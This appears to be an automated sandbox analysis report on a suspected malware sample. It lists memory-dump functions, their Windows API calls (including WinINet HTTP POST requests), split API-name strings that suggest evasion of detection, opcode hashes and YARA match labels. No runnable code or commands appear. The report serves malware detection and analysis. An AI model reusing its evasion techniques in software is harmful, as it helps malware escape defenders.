Instruction Fuzzy Hash: B4F015B2200208ABCB14DF89DC80EEB77ADAF88650F118249BE0897241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 010382DA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(01033D20,?,?,01033D20,00000000,FFFFFFFF), ref: 01038305

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b068c15232fb49b3e86df620924d198cac438b21089a36565097f406b9dbb5f6
Instruction ID: fbf7321d2d7b5e5e20e954ecc524351fdb52a5dd12c5fa4ae62e101fe547ca04
Opcode Fuzzy Hash: b068c15232fb49b3e86df620924d198cac438b21089a36565097f406b9dbb5f6
Instruction Fuzzy Hash: A7E08C71200204AFD710EF98CC44FE77BA8EF48210F014599BA5DDB241C530E50087D0

Uniqueness

Uniqueness Score: -1.00%

Function 010382E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(01033D20,?,?,01033D20,00000000,FFFFFFFF), ref: 01038305

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 6a36461f1e4da1f802950de45fbf9a1b3a925556dbb248216d47dd2c679a85cd
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: F6D012752002146BD710EF98DC45ED7775CEF44650F154595BA585B241C530F90086E0

Uniqueness

Uniqueness Score: -1.00%

Function 038D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D978A

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 60c9b1279a9dca70d9e0614282668b541c978fadb7c9704c2187a533fe6f93a1
Instruction ID: 67eef680a26d46a9f37abc72414dbbf63f09a9335f75a00b04a4655e50bb45ed
Opcode Fuzzy Hash: 60c9b1279a9dca70d9e0614282668b541c978fadb7c9704c2187a533fe6f93a1
Instruction Fuzzy Hash: B290026921305406D180B199540861A000597D2282F91D455A5009668CCA55886D6361

Uniqueness

Uniqueness Score: -1.00%

Function 038D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D9FEA

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0eb73072f2eb81f2491fdedb7a3a167317c3294a7b5a5847fc10b3abebef98b8
Instruction ID: 55f217095fe168c078e52fa3a0375bc93cbf4bdb6de356c2e78e14adacec41e4
Opcode Fuzzy Hash: 0eb73072f2eb81f2491fdedb7a3a167317c3294a7b5a5847fc10b3abebef98b8
Instruction Fuzzy Hash: 5590027131119806D110A1998404716000597D2281F51C451A5818668D87D5889D7162

Uniqueness

Uniqueness Score: -1.00%

Function 038D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D971A

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7287a5be293b6e4ee18fac3eaf071c58073de9466b64a753227e06bf6abff120
Instruction ID: 210c9a3dd564d77ebf14fdd554b9a5581a74380095e8c99f65fee734cf608b24
Opcode Fuzzy Hash: 7287a5be293b6e4ee18fac3eaf071c58073de9466b64a753227e06bf6abff120
Instruction Fuzzy Hash: E890027120105806D100A5D95408656000597E1381F51D051AA018665EC7A5889D7171

Uniqueness

Uniqueness Score: -1.00%

Function 038D96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D96DA

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae290b3cb3cba490a240fe198b0240f43be482cfdc74f49de8b6f0eb80a0fb0c
Instruction ID: d416fd1fcb2f43e7bc571167431f22c6efafaed76e70a31714c9c5af4048ab0f
Opcode Fuzzy Hash: ae290b3cb3cba490a240fe198b0240f43be482cfdc74f49de8b6f0eb80a0fb0c
Instruction Fuzzy Hash: 7090027120105C46D100A1994404B56000597E1381F51C056A5118764D8755C85D7561

Uniqueness

Uniqueness Score: -1.00%

Function 038D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D96EA

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a08ca2ed4adf68f2261d85aa5d6318d874e706f26b1650b3ecb5dbb3f51fb9c2
Instruction ID: 412813fb7350ec617f6a3d55bf42ab04d3ef6728c15fa07b572fadbbe01d2002
Opcode Fuzzy Hash: a08ca2ed4adf68f2261d85aa5d6318d874e706f26b1650b3ecb5dbb3f51fb9c2
Instruction Fuzzy Hash: 399002712010DC06D110A199840475A000597D1381F55C451A9418768D87D5889D7161

Uniqueness

Uniqueness Score: -1.00%

Function 038D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D9A5A

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 173a850c3ea94ef2034df3a30e8052f2dbe7115b4dce193c78cd0e7038f2aefa
Instruction ID: 48117b848d4883c1238cb09551bf88465b3ead06c2eb03e0d12a5c98b461e498
Opcode Fuzzy Hash: 173a850c3ea94ef2034df3a30e8052f2dbe7115b4dce193c78cd0e7038f2aefa
Instruction Fuzzy Hash: D990026121185446D200A5A94C14B17000597D1383F51C155A5148664CCA55886D6561

Uniqueness

Uniqueness Score: -1.00%

Function 038D9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D965A

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 170a0bd5a6d1c2e256f7ff679552ae4bf00b8ae4a34ad93416eb17f994e25ae8
Instruction ID: 5cf2921c4d5056db063dc34fa7185088a011b5d6497168f620e33ea886e0a829
Opcode Fuzzy Hash: 170a0bd5a6d1c2e256f7ff679552ae4bf00b8ae4a34ad93416eb17f994e25ae8
Instruction Fuzzy Hash: CC90027120509C46D140B1994404A56001597D1385F51C051A50587A4D97658D5DB6A1

Uniqueness

Uniqueness Score: -1.00%

Function 038D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D966A

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 890902d194e0a7b0169e0df1fa139318a53a9aec4bcb659ea4d57663caa3c4db
Instruction ID: 7c6f042b34eb42746a81980c846cd3ad15f6380e428fbe4f261ca5797fa7d5cb
Opcode Fuzzy Hash: 890902d194e0a7b0169e0df1fa139318a53a9aec4bcb659ea4d57663caa3c4db
Instruction Fuzzy Hash: BF90027120105C06D180B199440465A000597D2381F91C055A5019764DCB558A5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 038D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D99AA

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 05fb59630c54340c7cd8110e827dba452513a12f37e3c291ffaeafbca3705c74
Instruction ID: 0a683dbce82b3da102480fa1bb3e38cb14bfe0ba7dd08971072275bfb1d63042
Opcode Fuzzy Hash: 05fb59630c54340c7cd8110e827dba452513a12f37e3c291ffaeafbca3705c74
Instruction Fuzzy Hash: 399002A134105846D100A1994414B160005D7E2381F51C055E6058664D8759CC5E7166

Uniqueness

Uniqueness Score: -1.00%

Function 038D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D95DA

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0986776e6d9008839495fd4ae941c9da7d341d1197d0705b437564cdd044167
Instruction ID: 06b81eca9bc1d7f371b83e3b3558fabe48111b157130bae8cd5a9c8d0020ec15
Opcode Fuzzy Hash: c0986776e6d9008839495fd4ae941c9da7d341d1197d0705b437564cdd044167
Instruction Fuzzy Hash: C39002A1202054074105B1994414626400A97E1281B51C061E60086A0DC665889D7165

Uniqueness

Uniqueness Score: -1.00%

Function 038D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D991A

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6214e5b792f36bb80f7f0356b7853012c5ff9244c5f304268a8fd59e53aac35
Instruction ID: 8888c2fc540bb4ec8ce6504d1cefb0110e64ea22a8734c1a0eceaf967c64ec4a
Opcode Fuzzy Hash: b6214e5b792f36bb80f7f0356b7853012c5ff9244c5f304268a8fd59e53aac35
Instruction Fuzzy Hash: D99002B120105806D140B1994404756000597D1381F51C051AA058664E87998DDD76A5

Uniqueness

Uniqueness Score: -1.00%

Function 038D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D954A

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6066226f59aeee710ee1acf40c729e66778c4a83c1f526b0e20b1127438ccbf1
Instruction ID: dd5e21744885a307964e614da3b341777cf9378493807933e72c0984e370ec04
Opcode Fuzzy Hash: 6066226f59aeee710ee1acf40c729e66778c4a83c1f526b0e20b1127438ccbf1
Instruction Fuzzy Hash: 7C900265211054070105E5990704517004697D63D1351C061F6009660CD761886D6161

Uniqueness

Uniqueness Score: -1.00%

Function 038D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D984A

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f04927cfda2c4af50285b0cc7d13babfa809e6c145eb4cf06624d6bebe10562e
Instruction ID: 022b38ce10c6f116243275ebf23c6efddd7390c4d64412e7cf6befc7565dfad6
Opcode Fuzzy Hash: f04927cfda2c4af50285b0cc7d13babfa809e6c145eb4cf06624d6bebe10562e
Instruction Fuzzy Hash: 0B900261242095565545F19944045174006A7E12C1791C052A6408A60C8666985EE661

Uniqueness

Uniqueness Score: -1.00%

Function 038D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D986A

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0716ace74a2e4cea800b0d621efd668a437327365bab618495722893e7e22500
Instruction ID: a822603b6da40758c23376c437e5a1a3dac940b32cd46a797a4106856f74baf3
Opcode Fuzzy Hash: 0716ace74a2e4cea800b0d621efd668a437327365bab618495722893e7e22500
Instruction Fuzzy Hash: D390027120105817D111A1994504717000997D12C1F91C452A5418668D9796895EB161

Uniqueness

Uniqueness Score: -1.00%

Function 01038937, Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 50networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 01038928
HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0103899C

Strings

HttpSendRequestA, xrefs: 0103894D, 01038950
Requ, xrefs: 01038968
SendRequestA, xrefs: 01038992, 0103899A
HttpOpenRequestA, xrefs: 01038925
Http, xrefs: 0103895A
RequestA, xrefs: 01038927
RequestA, xrefs: 01038996, 0103899B
OpenRequestA, xrefs: 01038926
Send, xrefs: 01038961
HttpSendRequestA, xrefs: 0103898E, 01038999
estA, xrefs: 0103896F

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: HttpRequest$OpenSend
String ID: Http$HttpOpenRequestA$HttpSendRequestA$HttpSendRequestA$OpenRequestA$Requ$RequestA$RequestA$Send$SendRequestA$estA
API String ID: 3451552748-2409754840
Opcode ID: 42718c16ae07aef5c35e23c54938628ebb2deb29fccc220fe8721ca60609dbe9
Instruction ID: b5b92a3d8a72a5c3f1817c653a910310c03037af1c0dbeb9d9855c2220b6abbb
Opcode Fuzzy Hash: 42718c16ae07aef5c35e23c54938628ebb2deb29fccc220fe8721ca60609dbe9
Instruction Fuzzy Hash: 4C0161B1905259AFDB14CF98DC419BF7FBCEB95210F04828AFD4867200D2709A10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 010388C0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 01038928

Strings

HttpOpenRequestA, xrefs: 0103891A, 01038925
Open, xrefs: 010388E1
RequestA, xrefs: 01038922, 01038927
OpenRequestA, xrefs: 0103891E, 01038926
HttpOpenRequestA, xrefs: 010388CD, 010388D0
Http, xrefs: 010388DA
Requ, xrefs: 010388E8
estA, xrefs: 010388EF

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction ID: 13080e7c4a1e264ee113337bca0a94881cddcb02bfd2b4f03f764f5a865c6260
Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction Fuzzy Hash: 6E01E9B2905159AFCB14DF98D841DEF7BBDEB88210F158289FD48A7204D630ED10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 010388B6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 46networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 01038928

Strings

HttpOpenRequestA, xrefs: 0103891A, 01038925
Open, xrefs: 010388E1
RequestA, xrefs: 01038922, 01038927
OpenRequestA, xrefs: 0103891E, 01038926
HttpOpenRequestA, xrefs: 010388CD, 010388D0
Http, xrefs: 010388DA
Requ, xrefs: 010388E8
estA, xrefs: 010388EF

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: ef392e232e2e700e5da45ee5212f2638f7cb936fbb66070b6e0d54ff3f0c8609
Instruction ID: ca30d25d9b8b4fda8b0349948db57d10e16b1bd8024c99bb88e808dbdad549de
Opcode Fuzzy Hash: ef392e232e2e700e5da45ee5212f2638f7cb936fbb66070b6e0d54ff3f0c8609
Instruction Fuzzy Hash: 8401D7B2504159AFCB14DF88D881DEF7BB9EB98710F158288FE49A7204D670EE108BA1

Uniqueness

Uniqueness Score: -1.00%

Function 01038940, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0103899C

Strings

HttpSendRequestA, xrefs: 0103894D, 01038950
Requ, xrefs: 01038968
SendRequestA, xrefs: 01038992, 0103899A
Http, xrefs: 0103895A
RequestA, xrefs: 01038996, 0103899B
Send, xrefs: 01038961
HttpSendRequestA, xrefs: 0103898E, 01038999
estA, xrefs: 0103896F

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction ID: 8201222e7124b74272171f9c032d47e8b198ce228b61447c2498f232179b883e
Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction Fuzzy Hash: FD014FB2905119AFCB04DF98D8419EF7BBCEB98210F148189FD48A7204D670EE10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 01038836, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 56networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 010388A8

Strings

Inte, xrefs: 0103885A
rnet, xrefs: 01038861
InternetConnectA, xrefs: 0103889A, 010388A5
Conn, xrefs: 01038868
ConnectA, xrefs: 010388A2, 010388A7
ectA, xrefs: 0103886F
rnetConnectA, xrefs: 0103889E, 010388A6

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 19d111bcfc62310f90005646224ef66bfcc56f04e56810f30b2ffa31df66c3eb
Instruction ID: 687d0160a4ca43651c7b288c5fb113faeae8e24417df5ed35249696f9db6f7b4
Opcode Fuzzy Hash: 19d111bcfc62310f90005646224ef66bfcc56f04e56810f30b2ffa31df66c3eb
Instruction Fuzzy Hash: 0A115EB2905118AFCB14DF98DD40DEF7BBDEB88610F058299FA48A7241D630EA11CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01038840, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 010388A8

Strings

Inte, xrefs: 0103885A
rnet, xrefs: 01038861
InternetConnectA, xrefs: 0103889A, 010388A5
Conn, xrefs: 01038868
ConnectA, xrefs: 010388A2, 010388A7
ectA, xrefs: 0103886F
rnetConnectA, xrefs: 0103889E, 010388A6

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction ID: 7b6a4206f5d5702463f5091689a5321e6fc9ee7757116b448b59db8bd65eab5e
Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction Fuzzy Hash: 0601EDB2915119AFCB14DF99D941DEF77BDEB88310F158289BE48A7240D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 010387D0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 01038827

Strings

InternetOpenA, xrefs: 0103881D, 01038825
rnetOpenA, xrefs: 01038821, 01038826
Inte, xrefs: 010387EA
A, xrefs: 010387FF
Open, xrefs: 010387F8
rnet, xrefs: 010387F1

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction ID: f0cf13f5bb02e9dbf8ab2aa6b817051480769b6b4008b2cda66e6753c11cba73
Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction Fuzzy Hash: C7F01DB2901119AF9B14DF98DC419EB77BCFF48310F048689BE5897201D630AA10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 010387C9, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 38networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 01038827

Strings

InternetOpenA, xrefs: 0103881D, 01038825
rnetOpenA, xrefs: 01038821, 01038826
Inte, xrefs: 010387EA
A, xrefs: 010387FF
Open, xrefs: 010387F8
rnet, xrefs: 010387F1

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: d9707bcb133b264d2a80fecc3fda33ec2b7d96846a83d86c872665b21082b9a9
Instruction ID: 900800bdc2cf2f0044c32625a6b502367bae704e09fe4b64d13b92f01b58f002
Opcode Fuzzy Hash: d9707bcb133b264d2a80fecc3fda33ec2b7d96846a83d86c872665b21082b9a9
Instruction Fuzzy Hash: 9EF01DB1901119AFDB14DF98D9419AB7BB8FF48700B048589BE5467341D730AA10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01036EC7, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 102sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 01036F78

Strings

wininet.dll, xrefs: 01036F2E, 01036F37
POST, xrefs: 01036EAB, 01036E8E, 01036EAE, 01036EAF, 01036EB6
net.dll, xrefs: 01036F41, 01036F9F, 01036FAB

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: POST$net.dll$wininet.dll
API String ID: 3472027048-3140911592
Opcode ID: ad885d79d82b8a4fa019b7f9261c4197952994c24bdc293a7bc616ffd845a85f
Instruction ID: 04a26e6af392263df125ab6851e36cb225a49c1763b8b113ced50899e67cc9bb
Opcode Fuzzy Hash: ad885d79d82b8a4fa019b7f9261c4197952994c24bdc293a7bc616ffd845a85f
Instruction Fuzzy Hash: E531DEB1601605BBD715EFA8CC90FAAB7BCEF88304F008159FA599B241D372A655CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 010384B2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(01033506,?,01033C7F,01033C7F,?,01033506,?,?,?,?,?,00000000,00000000,?), ref: 010384AD
RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01023B93), ref: 010384ED

Strings

.z`, xrefs: 010384DC, 010384E8

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: .z`
API String ID: 2488874121-1441809116
Opcode ID: 6c4041fdf8b6b59b602fd800330a275c6f14d9e2b5f3c9fc5bf85ad13cb9d434
Instruction ID: ddc9d871dc2735e6cb4d46fd3df037cb7ea2d96e295b3df14db7a81647d2589f
Opcode Fuzzy Hash: 6c4041fdf8b6b59b602fd800330a275c6f14d9e2b5f3c9fc5bf85ad13cb9d434
Instruction Fuzzy Hash: 49F028B16042116FCB25EFA8DC44EE7776CEF84360B008A89FD4897651CA31A815CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 01036ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 01036F78

Strings

wininet.dll, xrefs: 01036F2E, 01036F37
net.dll, xrefs: 01036F41, 01036FC7, 01036F9F, 01036FAB, 01036FD3

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6a92b7a99dc5cf3c120e0dd34a87981038bb168d624f8961b1c3b790a82d205f
Instruction ID: 597374f96aa3067e26452a6771fae38c24cd08345826e3cc0e1a541405778618
Opcode Fuzzy Hash: 6a92b7a99dc5cf3c120e0dd34a87981038bb168d624f8961b1c3b790a82d205f
Instruction Fuzzy Hash: 91318DB1601705BBC715DFA8C8A0FABBBFCAB88700F40841DF65A9B241D771A545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010384C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01023B93), ref: 010384ED

Strings

.z`, xrefs: 010384DC, 010384E8

Memory Dump Source

